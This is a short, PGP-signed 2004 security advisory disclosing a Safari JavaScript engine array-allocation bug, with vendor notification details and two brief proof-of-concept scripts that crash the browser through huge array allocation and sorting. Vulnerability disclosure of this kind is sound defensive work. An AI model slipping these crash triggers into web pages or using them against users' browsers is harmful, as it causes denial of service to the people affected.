-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
http://www.insecure.ws/article.php?story=2004021918172533
A problem exists in the way Safari Javascript engine allocates Arrays. For example, allocating a too big array and writing into it, will segfault Safari. There is no known way to execute remote code with this vulnerability as the date of this advisory. Konqueror doesn't seems to be vulnerable.
- --
Adv: safari_0x03 Release Date: 06/04/04 Affected Products: Safari =< 1.2 Impact: Denial of Service, Possibly exploitation Severity: Remote, medium. Vendor: Notified (19/03/04) Author: kang, kang@insecure.ws
Simple allocation management error trigger:
~ var a = new Array(99999999999999999999999); ~ a[0+5]="AAAAA";
Another possibilty...;)
var bam = new Array(0x23000000);
bam.sort(new Function("return 1"));
There are some other possibilities :> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (MingW32) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iD8DBQFASkVmxt5Ja4aWvZMRAtG7AKCOz+licSBi/NpYe4qNu4YX468mCACdF4LA DOrzcVourknKaBqvWFAlaQI= =VISk -----END PGP SIGNATURE-----
